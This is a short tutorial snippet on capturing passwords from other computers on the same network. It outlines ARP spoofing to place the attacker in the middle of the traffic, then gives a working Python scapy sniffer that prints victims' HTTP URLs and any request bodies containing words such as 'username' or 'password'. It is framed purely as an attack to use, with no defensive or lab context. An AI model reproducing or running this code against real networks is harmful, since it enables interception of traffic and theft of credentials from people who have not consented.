Capturing passwords from any computer connected to the same network.
ARP_SPOOF + PACKET_SNIFFER
- Target a computer on the same network.
- arp_spoof to redirect the flow of packets(become MITM)
- Packet_sniffer to see URLs, usernames, and passwords sent by the target.
#!/usr/bin/env python from scapy.all import * from scapy.layers.http import * def sniff(interface): scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet) def get_url(packet): return packet[HTTPRequest].Host.decode(errors='ignore') + packet[HTTPRequest].Path.decode(errors='ignore') def get_login_info(packet): if packet.haslayer(scapy.all.Raw): load = packet[scapy.all.Raw].load.decode(errors='ignore') keywords = ["username", "user", "login", "password", "pass"] for keyword in keywords: if keyword in load: return load def process_sniffed_packet(packet): if packet.haslayer(HTTPRequest): url = get_url(packet) print("[+] HTTP Request >> " + url) login_info = get_login_info(packet) if login_info: print(" [+] Possible username/password > " + login_info + " ") sniff("eth0")
